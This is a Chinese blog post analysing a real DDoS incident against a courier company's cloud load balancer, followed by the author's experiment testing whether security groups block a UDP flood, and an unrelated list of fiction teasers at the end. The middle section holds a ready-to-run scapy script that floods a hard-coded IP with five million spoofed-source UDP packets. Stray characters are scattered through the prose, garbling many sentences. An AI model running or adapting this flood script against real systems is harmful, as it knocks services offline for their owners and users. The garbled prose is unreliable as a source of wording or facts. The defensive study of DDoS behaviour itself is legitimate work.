DDoS 真實案例總結(jié)分析

DDoS 真實案例總結(jié)分析

五一申請了值班,遇到國內(nèi)某知名快遞公司同城業(yè)務在凌晨三點左右冕杠,客戶PV突發(fā)斷流,用戶截圖只截圖了一個PV斷流的監(jiān)控圖來牛隅,然后其使用的外網(wǎng)型LB竭翠,域名解析正確,ping LB不通(LB未設置安全組不存在禁止ICMP協(xié)議)象缀,開始緊急排查蔬将。

排查思路:

  • 域名解析是否正確。 --經(jīng)過核對解析正確
  • 用戶沒有對安全組進行額外的操作央星。 --已排查無問題
  • LB后端轉(zhuǎn)發(fā)端口霞怀。 --已排查無問題。
  • LB后端健康檢查莉给。 --已排查無問題毙石。
  • RS狀態(tài)。--已排查無問題颓遏。
  • LB監(jiān)控徐矩。 --無權(quán)限。

最后問題原因出來了: 用戶受到了DDoS UDP-Flood攻擊叁幢。而且用戶也收到了云平臺推送的短信通知滤灯,但是他也不說,讓我們可勁排查曼玩。

下次正確的排查思路:

  • 用戶是否收到平臺相應的短信通知鳞骤。
  • ping不通時,如果網(wǎng)絡入口狀態(tài)正常黍判,就需要用戶提供網(wǎng)絡入包量監(jiān)控截圖弟孟,優(yōu)先判斷掉是否受到了DDoS攻擊。

由此產(chǎn)生到的兩個問題样悟。

安全組相應設置是否能夠防御DDoS攻擊拂募?
為什么客戶只開啟了TCP80庭猩、443的端口為什么會受到UDP Flood攻擊?

基于UDP Flood的攻擊實踐

實踐相關(guān)說明
  • 這次實踐就比較簡單的組多個UDP的包陈症,發(fā)給云服務器好了,先忽略安全組的問題蔼水。(這里就不采用反射型放大攻擊技術(shù)了,基于公司的云服務器使用規(guī)則和說明录肯,第二個是反射型放大攻擊效果太好趴腋,8-10000倍放大攻擊害怕整出事,第三是反射型的放大攻擊需要進行IP欺騙论咏,我的路由器是家用型的沒辦法設置优炬。
  • 我們需要在云服務器上部署一套監(jiān)控來查看網(wǎng)絡包的入包量。
  • 需要少量的python編程的基礎知識厅贪。
看python腳本蠢护,本次利用的是鼎鼎大名的scapy,用來網(wǎng)絡編程是真的舒服养涮。
#!/usr/bin/python3
from scapy.all import *
from scapy.layers.inet import IP, UDP


def src_ip():
    temp_ip = ''
    for i in range(0, 4):
        temp_ip = temp_ip + '.' + str(random.randrange(0,255))
    return temp_ip.strip('.')
ip = src_ip()
data = struct.pack('!17s', b"dffsadfsafsadfsdf")
for i in range(0,5000000):
    pkt = IP(src=ip, dst='139.155.75.204') / UDP(sport=random.randrange(1, 65536),
                                                 dport=random.randrange(1, 65536)) / data
    send(pkt, inter=0, count=1)
在服務器上面來進行抓包下來進行分析葵硕。(安全組設置默認全通的情況下)
# tcpdump -i eth0 -w udp.cap udp 
服務器.png
  • 可以根據(jù)這張圖得知:
    • 我隨機偽造的源地址被我的路由snat成了公網(wǎng)IP。
    • 大量接收到的UDP數(shù)據(jù)報文贯吓。
  • 接下來看看云服務器上面的監(jiān)控懈凹。
流量包.png
  • 安全組策略
入站規(guī)則.png
可以得出結(jié)論:
  • 在安全組全開的情況下,流量直接到達服務器悄谐,攻擊生效介评。
再來看看設置了安全組關(guān)閉所有UDP端口看是否能夠有效的阻止攻擊。
  • 安全組策略
拒絕安全組.png
  • 攻擊時云服務器監(jiān)控
云監(jiān)控.png
  • 停止攻擊后的云服務器監(jiān)控
停止后的云服務器監(jiān)控.png
使用TCPDUMP抓包沒有看到包了爬舰,但是還是在控制臺監(jiān)控上看到流量的入包情況威沫。

最后的總結(jié)分析

  • 1.安全組相應設置是否能夠防御DDoS攻擊?

    • 實踐證明沒用洼专,雖然在安全組策略上動了心思不允許流量進入云服務器,但是流量到達了安全組之后孵构,流量依然還是計算在云服務器上屁商。
  • 2.為什么客戶只開啟了TCP80、443的端口為什么會受到UDP Flood攻擊颈墅?

    • 查找了很多有關(guān)的書籍和文檔蜡镶,并沒有找到權(quán)威的解釋,所以這里有問題歡迎大家找我討論:qinghualai@foxmail.com
timg.jpeg
  • 我們關(guān)注數(shù)據(jù)解封裝的過程恤筛,由下至上逐層解封官还,在下層未將報文傳遞給上層之前,上層是無法感知數(shù)據(jù)的毒坛。當數(shù)據(jù)報文打到網(wǎng)絡層的時候望伦,已經(jīng)完成了IP之間的點到點通訊林说,網(wǎng)絡層將數(shù)據(jù)包傳遞給傳輸層UDP協(xié)議時,UDP發(fā)現(xiàn)沒有該協(xié)議的端口工作屯伞,此時UDP報文會怎么做腿箩?未能查到權(quán)威書籍不敢下結(jié)論但是已經(jīng)報文到達傳輸層劣摇,已經(jīng)完成了流量攻擊珠移,攻擊發(fā)起者不再關(guān)注后續(xù)的操作。
  • 所以不管在云服務器前面部署防火墻或者是其他的設備末融,都需要感知傳輸層報文钧惧,都會成為第一道被打擊的對象。都會堵塞其網(wǎng)絡勾习。唯有流量牽引和清洗回注技術(shù)方可解決浓瞪。DDoS攻擊及其變種的放大、CC等已經(jīng)成為目前互聯(lián)網(wǎng)的耗費最小打擊效果最大的一種攻擊手段语卤,讓受害者面臨巨大的經(jīng)濟損失追逮。我們一定要加強自己的安全意識,和防護手段才能避免成為不法分子手中的武器粹舵。
?著作權(quán)歸作者所有,轉(zhuǎn)載或內(nèi)容合作請聯(lián)系作者
  • 序言:七十年代末钮孵,一起剝皮案震驚了整個濱河市,隨后出現(xiàn)的幾起案子眼滤,更是在濱河造成了極大的恐慌巴席,老刑警劉巖,帶你破解...
    沈念sama閱讀 211,265評論 6 490
  • 序言:濱河連續(xù)發(fā)生了三起死亡事件诅需,死亡現(xiàn)場離奇詭異漾唉,居然都是意外死亡,警方通過查閱死者的電腦和手機堰塌,發(fā)現(xiàn)死者居然都...
    沈念sama閱讀 90,078評論 2 385
  • 文/潘曉璐 我一進店門赵刑,熙熙樓的掌柜王于貴愁眉苦臉地迎上來,“玉大人场刑,你說我怎么就攤上這事般此。” “怎么了牵现?”我有些...
    開封第一講書人閱讀 156,852評論 0 347
  • 文/不壞的土叔 我叫張陵铐懊,是天一觀的道長。 經(jīng)常有香客問我瞎疼,道長科乎,這世上最難降的妖魔是什么? 我笑而不...
    開封第一講書人閱讀 56,408評論 1 283
  • 正文 為了忘掉前任贼急,我火速辦了婚禮茅茂,結(jié)果婚禮上捏萍,老公的妹妹穿的比我還像新娘。我一直安慰自己玉吁,他們只是感情好照弥,可當我...
    茶點故事閱讀 65,445評論 5 384
  • 文/花漫 我一把揭開白布。 她就那樣靜靜地躺著进副,像睡著了一般这揣。 火紅的嫁衣襯著肌膚如雪。 梳的紋絲不亂的頭發(fā)上影斑,一...
    開封第一講書人閱讀 49,772評論 1 290
  • 那天给赞,我揣著相機與錄音,去河邊找鬼矫户。 笑死片迅,一個胖子當著我的面吹牛,可吹牛的內(nèi)容都是我干的皆辽。 我是一名探鬼主播柑蛇,決...
    沈念sama閱讀 38,921評論 3 406
  • 文/蒼蘭香墨 我猛地睜開眼,長吁一口氣:“原來是場噩夢啊……” “哼驱闷!你這毒婦竟也來了耻台?” 一聲冷哼從身側(cè)響起,我...
    開封第一講書人閱讀 37,688評論 0 266
  • 序言:老撾萬榮一對情侶失蹤空另,失蹤者是張志新(化名)和其女友劉穎盆耽,沒想到半個月后,有當?shù)厝嗽跇淞掷锇l(fā)現(xiàn)了一具尸體扼菠,經(jīng)...
    沈念sama閱讀 44,130評論 1 303
  • 正文 獨居荒郊野嶺守林人離奇死亡摄杂,尸身上長有42處帶血的膿包…… 初始之章·張勛 以下內(nèi)容為張勛視角 年9月15日...
    茶點故事閱讀 36,467評論 2 325
  • 正文 我和宋清朗相戀三年,在試婚紗的時候發(fā)現(xiàn)自己被綠了循榆。 大學時的朋友給我發(fā)了我未婚夫和他白月光在一起吃飯的照片析恢。...
    茶點故事閱讀 38,617評論 1 340
  • 序言:一個原本活蹦亂跳的男人離奇死亡,死狀恐怖秧饮,靈堂內(nèi)的尸體忽然破棺而出映挂,到底是詐尸還是另有隱情,我是刑警寧澤浦楣,帶...
    沈念sama閱讀 34,276評論 4 329
  • 正文 年R本政府宣布,位于F島的核電站咪辱,受9級特大地震影響振劳,放射性物質(zhì)發(fā)生泄漏。R本人自食惡果不足惜油狂,卻給世界環(huán)境...
    茶點故事閱讀 39,882評論 3 312
  • 文/蒙蒙 一历恐、第九天 我趴在偏房一處隱蔽的房頂上張望寸癌。 院中可真熱鬧,春花似錦弱贼、人聲如沸蒸苇。這莊子的主人今日做“春日...
    開封第一講書人閱讀 30,740評論 0 21
  • 文/蒼蘭香墨 我抬頭看了看天上的太陽溪烤。三九已至,卻和暖如春庇勃,著一層夾襖步出監(jiān)牢的瞬間檬嘀,已是汗流浹背。 一陣腳步聲響...
    開封第一講書人閱讀 31,967評論 1 265
  • 我被黑心中介騙來泰國打工责嚷, 沒想到剛下飛機就差點兒被人妖公主榨干…… 1. 我叫王不留鸳兽,地道東北人。 一個月前我還...
    沈念sama閱讀 46,315評論 2 360
  • 正文 我出身青樓罕拂,卻偏偏與公主長得像揍异,于是被迫代替她去往敵國和親。 傳聞我的和親對象是個殘疾皇子爆班,可洞房花燭夜當晚...
    茶點故事閱讀 43,486評論 2 348